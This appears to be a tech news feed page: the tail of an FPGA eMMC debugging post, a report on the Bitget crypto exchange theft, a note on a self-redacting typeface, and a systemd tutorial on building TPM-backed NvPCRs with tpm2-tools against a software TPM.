At this level, we can see three things going on. First, there’s a burst of (something) on the command line, followed by a second burst, followed by itok changing later.

Let’s dig deeper and look at the first burst from Fig. 6 in Fig. 7.

Fig 7. The SWITCH (CMD6) command and response

This looks like what we’re expecting. We send a CMD6, followed by a 32b value and then let up on the bus i_cmd_en=0 . The device then responds as expected.

Just for reference, you can see the same thing in Fig. 8, save that I’ve highlighted key portions of the trace to examine.

Fig 8. The SWITCH (CMD6) command annotated

This all looks reasonable. You can even read the command and response data off of the command wire if you’d like–just to verify the IP is doing what it says it’s doing.

Also notice the itok value switching to 0. This is our indication that the device has become busy.

Again, everything looks good here.

Now let’s look at the other burst in Fig. 9.

Fig 9. The BUSTEST_W (CMD19) command with no response

This is the command that failed. What’s the first thing we notice? The device never responded!

Let me highlight the difference in Fig. 10.

Fig 10. The BUSTEST_W (CMD19) command with no response

Why not?

Let’s go back to Fig. 6, and look at those itok bits. These are supposed to be copies of the data bit zero. These two bits, therefore, are capturing the devices busy status. Notice how they go to zero following the CMD6? That’s what we expect from an R1b command (R1 command, with a busy response). However, our IP is supposed to be waiting on that busy.

So, I went back and added two more lines to the trace. These are the ones shown at the bottom, already marked as dat0_busy and wait_for_busy . (It’s not uncommon to need to come back and add more data to a scope, once you know what you are looking for.) These give us insight into the logic within the eMMC front end used for calculating whether or not to tell the design the device is busy .

What I learned (from the broken design), was that the wait_for_busy line was constantly high, never acknowledging the fact that the DAT[0] line had gone to zero. Looking at this logic , you need to remember that this used to work. It hasn’t been changed since it last worked. Judging from the trace, it should’ve still worked. Why wasn’t it working?

Most of the signals used in this logic block were things I already had in my trace–or at least things I could infer. The only one missing was pending_ack . This signal … needed to chang–in order to support eMMC BOOT.

Let’s pause a minute to discuss the BOOT protocol. First, there are two types of boot requests. I’ll start with the original one, but the design (is supposed to) support this normal boot request as well as an “alternate” form of boot request. In the case of this boot option, the controller holds the CMD wire low after a reset. It then (optionally) waits for a BOOT acknowledgment token from the device. (I have the IP set up to wait, so the option is enabled.) Eventually, the device will start sending block upon block of data to the IP. Once a pre-programmed number of blocks has been received, the IP will raise the CMD wire and end the BOOT mode.

Fig. 11 shows a basic diagram of what this protocol is supposed to look like.

Fig 11. Basic eMMC BOOT protocol

At least, this is my understanding of the protocol from reading the eMMC specification. Given that BOOT isn’t (quite yet) working, I may not yet have it right.

The point, as far as this bug was concerned, is that this lead me to realize that the IP was waiting for a boot acknowledgement token . Nothing but a (boot) acknowledgment token would ever release the IP from this state! On the other hand, I had since reset the IP (but not this block), so I could move on from the (not yet working BOOT mode) and … this was now preventing me from moving forward.

At this point, all the hard work was done. A simple and quick fix was all that was required: I adjusted the block so that it now “reset” if any data was ever sent or received . That was enough. The bug had now been found and fixed.

Cost Analysis

A lot of people will say hardware is “hard.” It is “expensive.” Let’s understand what kind of “expense” was involved in finding this bug.

First, we’ll start out by being thankful this is an FPGA project. An FPGA design can be debugged and fixed in a day (or longer). An ASIC design might be debugged in a day, but respinning an ASIC without whatever bug is found will cost $10M+ and another six months to a year–in addition to any engineer time, which tends to fall out into the noise.

Second, note what it took to set this up: it took an entire debugging infrastructure. Unlike software, you cannot simply printf your way out of a hardware bug like this. You have to build the hardware that will then give you insight into what’s going on. That takes time. It also costs area on the FPGA. In my case, most of that time was spent years ago, and all that was required was adding my basic scope . to the design.

Third, it costs time waiting for a design to synthesize. In the case of the KlusterLab , it can currently rebuild with any changes you might add in between a half to a full hour. Thats one hour to add the scope, another hour to adjust it to look at something relevant, and then another hour to figure out what was going on. Finally, it takes another hour to propose and test a change.

So, for a fix that probably did little more than adjust how a couple wires within an FPGA were routed to a single LUT6, this cost a half a day of labour. Thankfully, this is the cost of finding one of the cheaper bugs I’ve had to deal with.

Finally, I haven’t included the cost of the board or its development in this measure.

Now, ask yourself, how easy (or hard) would this have been to debug using either formal verification or simulation tools? 5 minutes? 30? That, my friends, is why debugging in hardware is expensive.

Conclusion

As I write this today, my wonderful eMMC BOOT capability still isn’t working in hardware. Sigh. It should be.

  1. The eMMC BOOT capability passes a formal verification check
  2. It passes simulation .
  3. It’s just not passing hardware yet.

It’s not all bad news. The design now works in HS200 mode (200MBytes/s), and it has worked at least once in HS400 (400MB/s) mode. That’s enough that I’m going to color some of my to-do boxes green –but not really enough that I can use HS400 reliably yet.

Getting the rest of these capabililities up and running at this point is just a matter of time. To get these last capabilities up and running, I’ll be adjusting my scopes. Looking at what is (and isn’t working), making changes, and then testing again.

Likely along the way I’ll discover that I misunderstood some eMMC requirement somewhere, and then did a very good job of implementing the wrong thing. Once I know what I did wrong, I’ll be able to fix it. Then I’ll go back and adjust my formal proofs and simulations to make sure my test suite truly does match the eMMC specification.

Special Projects (2016)

Hacker News
openai.com
2026-09-25 04:55:43
Comments...

Hackers steal $351.6 million in Bitget crypto exchange hack

Bleeping Computer
www.bleepingcomputer.com
2026-09-25 04:33:44
​Cryptocurrency exchange Bitget disclosed today that suspected North Korean hackers have stolen $351.6 million from its hot and warm wallets. [...]...
Original Article

Bitcoin cryptocurrency

​Cryptocurrency exchange Bitget disclosed today that suspected North Korean hackers have stolen $351.6 million from its hot and warm wallets.

The company discovered the breach Thursday evening after its security systems flagged multiple unauthorized transfers from a limited number of crypto wallets.

Bitget has temporarily suspended all withdrawals while investigating the incident with help from law enforcement agencies, on-chain security institutions, and cybersecurity experts at Mandiant and SlowMist.

It also said its self-custodial Bitget Wallet was not affected, as it operates on infrastructure independent of Bitget Exchange and was not impacted by the attack, and added that the User Protection Fund (which holds 5,500 BTC currently worth about $464 million) will cover all losses.

"Based on our current assessment, approximately $351.6 million in assets were affected. Bitget’s cold wallets and the overwhelming majority of platform assets remain secure and unaffected," it said .

"The incident falls within the coverage of Bitget’s User Protection Fund, which currently holds more than $464 million. Customer account balances remain accurate, and deposits and trading continue to operate normally."

The company has yet to share more information on how the attackers accessed its key backend wallet-service system to forge transfer information and trigger the authorization-signing process.

Bitget CEO Gracy Chen said the incident involved the Ethereum, XRP Ledger, Arbitrum, Avalanche, Optimism, BSC, and Base chains and affected multiple assets, including ETH, XRP (single-chain loss is the largest), BNB, AVAX, USDT, USDC, and other tokens.

Chen added that some chains have also confirmed that the hacker wallet addresses have been frozen since the attack and linked the theft to North Korean hackers.

"Based on IP behavior patterns and on-chain analysis, the attack method in this incident is highly consistent with known patterns of North Korean hacker organizations. We have reported to relevant institutions and are fully cooperating in conducting a global investigation," Chen said .

"The attacker compromised a critical backend system within our wallet infrastructure, used it to spoof transaction data, and triggered our authorization process to move funds out. No further unauthorized transfers are possible. The specific method of system intrusion remains under active investigation."

In its latest update , Bitget said it will restore withdrawals as soon as possible, after investigators confirm it's safe to resume normal operations.

North Korean hackers have previously been linked to many other major crypto theft incidents, including the Bybit heist , in which they stole $1.5 billion from the crypto exchange's ETH cold wallet.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

Paranoia-Sans: A conspiratorial typeface

Lobsters
github.com
2026-09-25 04:32:30
Comments...
Original Article

V. 1.2

A self-censoring font by Florian Egermann , 2020

Based on Courier Prime Sans by Quote-Unquote Apps .

https://www.fleg.de/paranoia

Paranoia Sans Demo

About

PARANOIA SANS is a self-censoring, conspiratorial typeface that will automatically redact terms that are popular in conspiracy myths.

It IS a conspiracy. They ARE after you. And now, you have a typeface to prove it.

How it works

PARANOIA SANS uses ligatures (an open type font feature that replaces a combination of strings with other characters) to replace a list of conspiratorial terms with a graphic resembling a redacted word. E.g. the ligature "5G" is replaced by a two-character wide black box.

Understanding NvPCRs in systemd v262

Lobsters
katexochen.aro.bz
2026-09-25 04:26:44
Comments...
Original Article

systemd answers TPM PCR scarcity with additional PCR-like registers allocated in the TPM’s NV memory, with an anchoring design that was reworked in v262. In this hands-on deep dive, we rebuild a systemd NvPCR from scratch against a software TPM, picking up the required TPM concepts along the way, and analyze why the design is secure.

Why can’t systemd get enough of those PCRs?

Many of systemd’s security features rely on TPM PCR measurements: Passwordless full disk encryption can unlock disks automatically if the PCR measurements are as expected, preventing credential theft while still allowing unattended reboots of remote machines with encrypted root disk. Service credentials can be encrypted against the expected PCR state. Boot-phase bound credentials are also supported, allowing secrets that can only ever be decrypted in the initrd. And with remote attestation, a machine can prove to another party what it booted and what happened since, by having the TPM sign its current PCR state (a so-called quote). All of this is built on PCR measurements.

TPM PCRs are scarce. On common standard-compliant TPMs there are only 24 PCRs available. The lower PCR indices 0-7 are owned by the firmware and used for UEFI boot measurements. 16 is a debug PCR that can be reset and is therefore unusable, 17-22 are reserved for Dynamic Root of Trust for Measurements 1 , and 23 is reserved for application support. So only 8-15 are left for systemd to do all OS-related measurements 2 .

From a remote attestation perspective, a single measurement register can be enough to verify a system. We can use the measurement log to replay the events and interpret what was measured to land on the final value we observe. But PCRs are not only read by remote verifiers, they are also what local secrets are locked against, and that use needs predictable values: every event flowing into such a PCR must be known in advance, otherwise the policy breaks. Some measurements are inherently unpredictable, depending for example on the closed source vendor firmware of the individual platform, or on the behavior of users. We might want to include a login event in our remote attestation quote, but the root disk should still be able to unlock itself after someone logged in. So the noisy and unpredictable event types need registers of their own: out of the way of the PCRs that locks depend on, but still measured and attestable. And that’s where systemd was quickly hitting a hard limit: with only eight PCR slots available to the OS, there isn’t much space to give event types their own register.

This is why systemd introduced NvPCRs in v259 : additional PCR-like registers, allocated in the TPM’s non-volatile memory, hence the name. They host the event types we don’t want in the real PCRs, and their values are consumed through remote attestation. In v262, the anchoring of NvPCRs was reworked to increase their security. Previously, the anchoring was based on a random secret sealed against PCR 11 and stored on disk, which an attacker could recover by booting a different OS that replays the expected PCR 11 values, or simply replace with a secret they know. This blog post describes the reworked design that ships in v262: how it works, and why it is secure.

Setup for follow-along

We’ll check out the basic working principles and get a feeling for the matter by constructing our own NvPCRs against a software TPM on the command line. If you’d rather just read, that’s fine, too, I’ll provide all important output.

As a prerequisite, install the required tools, for example with nix or dnf:

nix shell nixpkgs#{tpm2-tools,xxd,swtpm,openssl}
dnf install tpm2-tools vim-common swtpm openssl

Create a directory you want to work in and start the software TPM:

mkdir state
swtpm socket \
  --tpm2 \
  --tpmstate "dir=$PWD/state" \
  --ctrl "type=tcp,port=2322" \
  --server "type=tcp,port=2321" \
  --flags startup-clear \
  --pid "file=$PWD/swtpm.pid" \
  -d

Export the connection details so tpm2-tools knows where to find the TPM:

export TPM2TOOLS_TCTI="swtpm:host=127.0.0.1,port=2321"

Check the TPM is working by reading the PCRs:

This should show the PCRs 0-16 being all zero. If not, you might be talking to the TPM of your platform and not the software TPM, check again that you exported TPM2TOOLS_TCTI correctly. This is important, as we don’t want the following experiments to mess with the sealed secrets of your platform.

TPM NV index as PCR replacement

A TPM NV index 3 is a non-volatile storage slot identified by a unique name. NV indices persist across reboots and can hold user defined data: an opaque value, a counter, bitfield or similar. The properties of an NV index define how it behaves and what it can be used for: its handle, the size of the stored data, a set of attributes controlling how the index can be manipulated or read, and an authorization policy and authorization value (the latter being the only non-public property) that optionally specify under which conditions the index can be manipulated. Each index has a nameAlg , the hash algorithm used to compute the unique name from the public properties of the index 4 as

Name = nameAlg || H_nameAlg(marshal(TPMS_NV_PUBLIC)) .

Let’s create a PCR-like NV index! We are using tpm2_nvdefine from tpm2-tools for this. 0x01000000 is the handle for the index that we are defining (somewhat randomly picked). The --hierarchy=o flag selects the authorization we define the index under: NV indexes like ours live in the TPM’s owner hierarchy, and defining or undefining them requires the owner authorization value 5 . On a typical Linux system that value is empty, so effectively anyone with access to the TPM device, usually root, holds owner authorization. The hash-algorithm flag corresponds to the previously named nameAlg and is chosen as sha256. Then we select the attributes for our NV index: authread|authwrite , in combination with an empty authorization value, allows anyone with access to the device to read and write the index. And nt=extend says we want this to be extendable like a PCR.

tpm2_nvdefine 0x01000000 \
  --hierarchy=o \
  --hash-algorithm=sha256 \
  --attributes="nt=extend|authread|authwrite"

Take a look at the result using the following command:

0x1000000:
  name: 000be9606b61ec27bc8deec096dd38a6f8961cb8b3ef2fe879b27de704ab2f3d44e3
  hash algorithm:
    friendly: sha256
    value: 0xB
  attributes:
    friendly: authwrite|nt=0x1|authread
    value: 0x40044
  size: 32

We can see the properties we configured 6 , the size, and the name that is a hash over the public properties. As you defined the exact same properties as I did, you will get exactly the same hash as index name.

Now we can use our NV index like a proper PCR and extend it with a measurement, for example with a login event of user Alice:

printf 'user-alice-logged-in' > m1.bin
tpm2_nvextend 0x01000000 --input=m1.bin

Then read its value:

tpm2_nvread 0x01000000 --size=32 | xxd -p -c 64
bd9927a653c6c33297b7d884a8ad99df0f5b5b1c1e1e86f762b3aced8bc77f50

If we now inspect the NV index again, we can observe something interesting: The index got a new attribute written , indicating that the index has been written one or more times. As the set of attributes was updated, and the name of the index is a hash including the attributes, it got a new name too! We will make use of this later.

0x1000000:
  name: 000b1191942a636c11a57571f0d435c290a1955788229305ce0aa8a2f393e9ed770c
  hash algorithm:
    friendly: sha256
    value: 0xB
  attributes:
    friendly: authwrite|nt=0x1|authread|written
    value: 0x20040044
  size: 32

You can do another measurement if you like, measuring the login event of Bob:

printf 'user-bob-logged-in' > m2.bin
tpm2_nvextend 0x01000000 --input=m2.bin
tpm2_nvread 0x01000000 --size=32 | xxd -p -c 64
e758d6e2e54620fd45b9cd1fd57cbba62757f12751d549fd2fc957ed1908ed29

At this point, the value of the NV index is HASH(HASH(0x0 || m1) || m2) 7 . The index name didn’t change again with the second measurement.

So we have an NV index that is extendable in the same way a PCR is. Can we already use it as PCR replacement? We can’t. We are missing a fundamental property of the real PCRs: To use the measurement chain as proof for anything, it must not be resettable or replayable during the runtime of the system! Otherwise an attacker that gained access to the system could just reset the measurement history and replay the history of an unmanipulated system, making the attack undiscoverable through remote attestation.

Sadly, this isn’t a property the TPM grants us for our PCR-like NV index: We defined the index at system runtime, and we can undefine it again:

tpm2_nvundefine 0x01000000 --hierarchy=o
tpm2_nvreadpublic

Given the two example measurements we did in this section, if Alice has malicious intentions and gains root access, and with it owner authorization, they can just undefine and redefine the index, then replay a history where Alice never logged in. The redefined index gets the exact same name, and we couldn’t notice.

What we need is an index that anyone can extend, but that nobody can restart during the runtime of the system. Policies are the TPM’s tool to express such conditions.

Exploring policies

A very powerful concept the TPM interface provides is the policy 8 . Such a policy is an opaque digest stored with the object it protects, in the authPolicy property we already saw in the public properties of our NV index. To fulfill a policy, we request a policy session from the TPM. Each session has its own context, containing a digest called policyDigest and a set of constraints that can be modified by executing policy assertions. A fresh session has a policyDigest that is all zero. Within a session, we can then run different policy commands against the TPM, each asserting some condition. Some assertions are checked immediately while the command executes. Others are deferred: the command records a constraint in the session context, and the TPM only checks it once the session is used for authorization. Either way, each command extends the session’s digest, using the following logic:

policyDigest := H(policyDigest_old || commandCode || command-specific args)

That extend scheme works exactly like a PCR, even though the policyDigest is not backed by a real PCR. A caller can present different types of evidence, each extending the policyDigest . If the assertions add up so that the session’s policyDigest matches the authPolicy of the index, the session is authorized and the desired command can be called with it. The author of a policy computes the expected authPolicy digest via a trial session in a trusted environment or through pre-calculation offline. A trial session runs the same digest calculation, but doesn’t verify any of the conditions, and in exchange can’t be used to authorize anything. This is what allows an author to compute a policy for a state the machine currently isn’t in.

PolicyPCR

The cool thing is that policies can make permission depend on the machine state by locking against the expected value of a PCR. Let’s create such a policy! First, we start a trial session to define the policy we want to set on our NV index. This is done by invoking tpm2_startauthsession without the --policy-session flag.

tpm2_startauthsession --session=trial.ctx

We then call tpm2_policypcr to create an assertion over the currently observed PCR value(s) we select via --pcr-list= . For our experiment, we use PCR 15, one of the OS-owned PCRs. The application PCR 23 might look like the natural playground, but like the debug PCR 16 it can be reset at runtime, which is exactly the property we are trying to get rid of:

tpm2_policypcr --session=trial.ctx \
  --pcr-list=sha256:15 \
  --policy=pcr15.policy
7e247a603cd1052cabc095741b8ee2f7458aabeee960b8ec97d7f090171a039a

The resulting policy digest is printed and written to pcr15.policy 9 . Then end the session:

tpm2_flushcontext trial.ctx

Let’s recreate the NV index from before, this time we protect write access to it with the policy we just created:

tpm2_nvdefine 0x01000000 \
  --hierarchy=o \
  --hash-algorithm=sha256 \
  --attributes="nt=extend|authread|policywrite" \
  --policy=pcr15.policy

Notice we added both the --policy= flag and the policyWrite attribute. We leave the authRead untouched. There is a policyRead too, but usually restricting who can extend the index is much more interesting.

0x1000000:
  name: 000b14a6915e5830ff2b83ebc87cdf5ac481fb29637c246489bdab1bba19948bb729
  hash algorithm:
    friendly: sha256
    value: 0xB
  attributes:
    friendly: policywrite|nt=0x1|authread
    value: 0x40048
  size: 32
  authorization policy: 7E247A603CD1052CABC095741B8EE2F7458AABEEE960B8EC97D7F090171A039A

Just trying to extend as before will now fail with an authorization error:

tpm2_nvextend 0x01000000 --input=m1.bin
ERROR: Esys_NV_Extend(0x12F) - tpm:error(2.0): authValue or authPolicy is not
available for selected entity

Instead, to write to the index, we need to start a policy session and satisfy the policy by presenting the current PCR 15 state 10 . After that, we can do the extension, presenting the session as authorization. And remember to flush the session context at the end.

tpm2_startauthsession --session=s.ctx --policy-session
tpm2_policypcr --session=s.ctx --pcr-list=sha256:15
tpm2_nvextend 0x01000000 \
  --hierarchy=0x01000000 \
  --auth=session:s.ctx \
  --input=m1.bin
tpm2_flushcontext s.ctx

If PCR 15 advances, the policy can’t be fulfilled anymore. Run the following command to extend the PCR:

echo something | tpm2_pcrevent 15

Now retry the three steps from before that unlocked the session based on the PCR. The extend will fail with tpm:session(1):a policy check failed , as the PCR advanced and neither its current value (nor any of its future values!) matches the one included in the policy anymore. The access to the PCR-bound index expired and can’t be regained during the runtime of the machine.

Finally, undefine the index again with:

tpm2_nvundefine 0x01000000 --hierarchy=o

Locking against a PCR with PolicyPCR is super cool, but it is also brittle 11 : At the end of the previous section, a measurement changed, and our access expired with no way to regain it. That is a problem, because PCR values change for legitimate reasons all the time. Think of the passwordless disk unlock from the intro: the disk key is sealed against the PCR state of the boot chain, and the next kernel update changes exactly that state. The disk wouldn’t unlock anymore, even though nothing bad happened, and we certainly don’t want to re-encrypt the disk on every update.

What would be nice to have instead is a policy that stays stable while the approved state can change. Luckily, there is another mechanism that can be used to create a policy: PolicyAuthorize . It introduces a level of indirection and delegation, allowing us to create a policy from a public key instead of a system state. To authorize, you satisfy another, concrete policy (like a PolicyPCR ), then present a signature over the expected policy digest and a policyRef . The concrete policy digest itself is not part of the policy. Whoever owns the key can approve new concrete policies, offline. The policyRef scopes the signatures so the signed policy can’t be used out of context.

Let’s create a RSA key pair to explore PolicyAuthorize :

openssl genrsa -out sign.key.pem 2048
openssl rsa -in sign.key.pem -pubout -out sign.pub.pem

Load the public key into the TPM so we can use it as part of a policy:

tpm2_loadexternal \
  --hierarchy=o \
  --key-algorithm=rsa \
  --public=sign.pub.pem \
  --key-context=signkey.ctx \
  --name=signkey.name
name: 000b028928264dd3d32fc9c10072d8f3e286ce20ef02c0873ecca601c3d4534b7661

The printed name is what will bind our policy to this key. And it is computed just like the NV index names we saw earlier: as a digest over the object’s public properties, which for a key includes the public key itself. tpm2_readpublic shows these public properties:

tpm2_readpublic --object-context=signkey.ctx
name: 000b028928264dd3d32fc9c10072d8f3e286ce20ef02c0873ecca601c3d4534b7661
qualified name: 000b028928264dd3d32fc9c10072d8f3e286ce20ef02c0873ecca601c3d4534b7661
name-alg:
  value: sha256
  raw: 0xb
attributes:
  value: userwithauth|decrypt|sign
  raw: 0x60040
type:
  value: rsa
  raw: 0x1
exponent: 65537
bits: 2048
...
rsa: ...

Besides the name algorithm, the object attributes and the key parameters, the public area contains the raw RSA modulus (shortened here). Any change to the public key changes the name, and with it any policy created from that name.

Now use another trial session and the key name to create a policy that can be authorized using this key:

printf 'demo' > policyref.bin
tpm2_startauthsession --session=trial.ctx
tpm2_policyauthorize --session=trial.ctx \
  --name=signkey.name \
  --qualification=policyref.bin \
  --policy=authorized.policy
tpm2_flushcontext trial.ctx
tpm2_flushcontext --transient-object
6120c875c3afb0b2811fc7c3c045c32fb53596e8009e96855ed4aa6c332d0bfb

The resulting policy digest contains no PCR value at all, it only depends on the key name (and through it on the public key) and the policyRef label. As you generated a different key pair, the policy hash you will get will differ, too. Notice the second flush invocation with --transient-object : it removes the key object that tpm2_loadexternal left behind in the TPM’s limited transient memory. tpm2-tools doesn’t flush what it loads, so we will repeat this cleanup after commands that load keys. The printed policy hash is written to authorized.policy , which we can then use to define our NV index again, similar to how we did it before:

tpm2_nvdefine 0x01000000 \
  --hierarchy=o \
  --hash-algorithm=sha256 \
  --attributes="nt=extend|authread|policywrite" \
  --policy=authorized.policy

For now, nobody can write this index, because no signature satisfying the policy exists yet.

In practice, this flow will usually have two parties: the key holder is for example a team of distro maintainers. The individual machine is the other party that presents evidence to its TPM. The key holder computes a concrete policy digest to approve, for example a PolicyPCR for a specific build, then creates a signature over that digest and the policyRef .

Create a new PCR policy for the updated value of PCR 15, that’s what we want to bless now. Like in the previous section we run a trial session to get a policy digest for the observed state:

tpm2_startauthsession --session=trial.ctx
tpm2_policypcr --session=trial.ctx \
  --pcr-list=sha256:15 \
  --policy=approved.policy
tpm2_flushcontext trial.ctx

Concatenate the policy and the policyRef:

cat approved.policy policyref.bin > tbs.bin

Then sign the whole thing with the private key:

openssl dgst -sha256 -sign sign.key.pem -out approved.sig tbs.bin

The policy and its signature can then be shipped to a machine, for example as part of an image or update. This is the artifact showing the key holder approved this concrete policy.

On the machine, we let the TPM verify the signature first:

tpm2_verifysignature --key-context=signkey.ctx \
  --hash-algorithm=sha256 \
  --message=tbs.bin \
  --scheme=rsassa \
  --signature=approved.sig \
  --ticket=verify.tkt

On successful verification, the TPM will return a ticket, which is an HMAC-stamped proof 12 . We can then start a new policy session, satisfy the concrete policy (the one that we created the signature over), then present the ticket, the policyRef and the policy to authenticate the session.

tpm2_startauthsession --session=s.ctx --policy-session
tpm2_policypcr --session=s.ctx --pcr-list=sha256:15
tpm2_policyauthorize --session=s.ctx \
  --input=approved.policy \
  --qualification=policyref.bin \
  --name=signkey.name \
  --ticket=verify.tkt

On the tpm2_policyauthorize call, the TPM ensures your session digest equals the signed approved.policy , checks the ticket is valid for the given policyRef and key, then swaps the current session digest to the authorize policy ( authorized.policy ).

Afterwards, the session digest matches the authorize policy we set during index definition, and the session is unlocked:

tpm2_nvextend 0x01000000 \
    --hierarchy=0x01000000 \
    --auth=session:s.ctx \
    --input=m1.bin
tpm2_flushcontext s.ctx
tpm2_flushcontext --transient-object

With this construct, in case the PCR 15 measurement is changed by a future update, the index is not bricked, it doesn’t even need to be changed. The trusted key holder will just sign a new policy matching the new PCR 15 state and ship that new policy as part of the update. On the machine, the NV index with the same policy keeps working. This is exactly how systemd keeps TPM-based disk unlock working across kernel updates: every UKI ships fresh signatures matching its own expected PCR 11 state. But also keep the flip side of this mechanism in mind: if the key holder only ever signs a single state, the policy is only satisfiable while the machine is in exactly that state. We will exploit this in a moment.

PolicyOR

A policy digest commits to one exact chain of assertions. All the elements are sequenced via AND, we must match every element in order to get the expected session hash. Sometimes we might want to construct an alternative branch instead, for example if we know two good states, both of which we want to allow, or two different ways to authorize the same operation. For this PolicyOR exists 13 . The TPM will check if the current session’s digest is a member of the allowed list, then replace it in a similar way it does when the PolicyAuthorize ticket is resolved. The policy is satisfied if one of its branches is satisfied.

Building a secure, policy-based NvPCR

With the previously introduced primitives, we can now take a look at how systemd constructs a secure NvPCR. The NV index is protected by a write policy with two branches that are connected with a PolicyOR : A PolicyAuthorize branch with a public key and the policyRef initrd , and a PolicyNvWritten(true) branch.

Let’s take a look at the PolicyNvWritten(true) branch first. This assertion allows checking for the written attribute as part of a policy 14 . So PolicyNvWritten(true) can be satisfied without further authorization if the NvPCR has already been extended before. This is the branch that is used after the initial setup, during runtime. At that point, extending the NvPCR doesn’t require additional authentication and can be done by any component with access to the device.

The other branch, PolicyAuthorize , can be satisfied with a signed policy. This branch must be used for the initial extend of the NvPCR. The concrete policy used by systemd is a PCR policy for PCR 11, matching the expected state of that PCR when running in the initrd during early boot. systemd tracks the boot phase in PCR 11: When the initrd is started, systemd-pcrphase-initrd.service measures the event enter-initrd . We construct the PCR policy against the expected state of PCR 11 after this event. If the system hasn’t been tampered with up to that point and the signature is valid, the signed PCR policy is satisfied and the NvPCR can be initially extended. When progressing to the next boot phase, the same service measures the phase event leave-initrd . This locks the PolicyAuthorize branch for the rest of the system lifetime. The NvPCR can then only be extended via the PolicyNvWritten branch.

You might wonder why the write policy takes the indirection via PolicyAuthorize instead of embedding the PCR policy directly. On a real system, PCR 11 doesn’t only contain the phase events: the UKI stub measures the kernel and initrd into it first, so the initrd state of PCR 11 changes with every update. Embedded directly, every update would change the write policy and with it the name of the index, and the NvPCR would have to be recreated on every update. With PolicyAuthorize , the write policy and the name stay stable, and only the signature shipped with the UKI changes.

Let’s construct this final NvPCR version, similar to how systemd does it. Measure the event that marks the start of the initrd boot phase, as done by systemd-pcrphase-initrd.service :

echo -n "enter-initrd" | tpm2_pcrevent 11
tpm2_pcrread sha256:11
  sha256:
    11: 0xD15B0E8E244E65C40F024E95773F2347CE4EF3FFE6B597C9A14B50BBAB6DF319

Let’s author the write policy. The key from the previous section is reused. It takes the role of the UKI’s PCR signing key, whose public half is shipped in the .pcrpkey section of the UKI. First write the policyRef with the value initrd 15 . Then use a trial session to create the key-based branch of the policy that must be used for the first write from within the initrd:

printf 'initrd' > initrd.ref
tpm2_startauthsession --session=trial.ctx
tpm2_policyauthorize --session=trial.ctx \
  --name=signkey.name \
  --qualification=initrd.ref \
  --policy=init.branch
tpm2_flushcontext trial.ctx

Next, create the second branch of the policy, the PolicyNvWritten(true) :

tpm2_startauthsession --session=trial.ctx
tpm2_policynvwritten --session=trial.ctx --policy=written.branch s
tpm2_flushcontext trial.ctx

And finally combine the two policies with a PolicyOR :

tpm2_startauthsession --session=trial.ctx
tpm2_policyor --session=trial.ctx \
  --policy-list=sha256:init.branch,written.branch \
  --policy=write.policy
tpm2_flushcontext trial.ctx

We use that policy to define the NvPCR, nearly identical to how we did before:

tpm2_nvdefine 0x01D10200 \
    --hierarchy=o \
    --hash-algorithm=sha256 \
    --attributes="nt=extend|policywrite|ownerread|authread|clear_stclear" \
    --policy=write.policy
tpm2_nvreadpublic 0x01D10200
0x1d10200:
    name: 000bf2e615c91fc1738ee23d6906f3cc5da932ed3d3dd19f99de0d0e0839712d8ecf
    ...
    attributes:
      friendly: policywrite|nt=0x1|ownerread|authread|clear_stclear
      value: 0x8060048
    size: 32
    authorization policy: A765636C5A04447BD790486F98DAF82CA694868DF19C1AF80632A52261E374EF

As the write policy depends on your generated key, your authorization policy and the index name will again differ from mine. The only thing new here is the clear_stclear attribute: It tells the TPM to clear the NV index on reboot 16 . Similar to PCRs, the NvPCR should reset on reboot, not persist measurements of a previous boot to the next. The written attribute is also cleared on reset.

0x01D10200 is the real handle from the NV index range systemd uses. Which NvPCRs exist on a system is defined by small JSON files in /usr/lib/nvpcr/*.nvpcr , which since v262 must be shipped as part of the UKI. systemd currently ships four definitions: hardware for the product UUID, cryptsetup for the LUKS unlock mechanism used, verity for the root hashes of activated verity volumes, and login for user logins 17 . All four record events that are unpredictable or unbounded in number, exactly the kind we don’t want in the real PCRs.

Then we craft the concrete PCR policy for the expected initrd state of PCR 11 and sign it together with the policyRef :

tpm2_startauthsession --session=trial.ctx
tpm2_policypcr --session=trial.ctx --pcr-list=sha256:11 --policy=initrd.policy
tpm2_flushcontext trial.ctx
cat initrd.policy initrd.ref > tbs.bin
openssl dgst -sha256 -sign sign.key.pem -out initrd.sig tbs.bin

In systemd, this is done at image build time with ukify. The tool gained a new flag --sign-initrd-pcrs that precomputes the expected PCR 11 value for the enter-initrd phase and embeds the signed policy in the UKI into a .pcrsig section.

On each boot, systemd’s systemd-tpm2-setup-early.service uses the signature and the authorize policy path to initialize the NvPCR in the initrd. First, we let the TPM verify the signature:

tpm2_verifysignature --key-context=signkey.ctx \
  --hash-algorithm=sha256 --message=tbs.bin --scheme=rsassa \
  --signature=initrd.sig --ticket=initrd.tkt

Then we start a policy session. We satisfy the PCR policy with the current state of PCR 11, then call tpm2_policyauthorize to present the signature over the initrd.policy . Finally, we call tpm2_policyor to present both branches and match the expected auth digest of our NvPCR:

tpm2_startauthsession --session=s.ctx --policy-session
tpm2_policypcr --session=s.ctx --pcr-list=sha256:11
tpm2_policyauthorize --session=s.ctx --input=initrd.policy \
  --qualification=initrd.ref --name=signkey.name --ticket=initrd.tkt
tpm2_policyor --session=s.ctx --policy-list=sha256:init.branch,written.branch

With this session state, the policy is satisfied and we extend the NvPCR. systemd initializes NvPCRs with all-zeros. The written value doesn’t matter, the point is that the index gains the written attribute, and that this first extend happened under the signed policy.

head -c 32 /dev/zero > zero.bin
tpm2_nvextend 0x01D10200 --hierarchy=0x01D10200 --auth=session:s.ctx --input=zero.bin
tpm2_flushcontext s.ctx
tpm2_flushcontext --transient-object
tpm2_nvread 0x01D10200 --size=32 | xxd -p -c 64
f5a5fd42d16a20302798ef6ed309979b43003d2320d9f0e8ea9831a92759fb4b

Because the extended value is all-zeros, every freshly initialized SHA-256 NvPCR starts out at this exact value, SHA256(zeros32 || zeros32) , on every machine. With the first write done, the index gained the written attribute and thereby a new name:

tpm2_nvreadpublic 0x01D10200
0x1d10200:
    name: 000bf08c214c037f85d3520549dba23471a88af8aab1913bf269edfbb44b6d2de9f5
    ...
    attributes:
      friendly: policywrite|nt=0x1|ownerread|authread|clear_stclear|written
      value: 0x28060048

Keep this name in mind, we will get back to it in the next section.

At the end of the initrd boot phase, systemd will measure the event marking the end of that phase:

echo -n "leave-initrd" | tpm2_pcrevent 11

With this, the signed policy cannot be satisfied anymore until the next reboot!

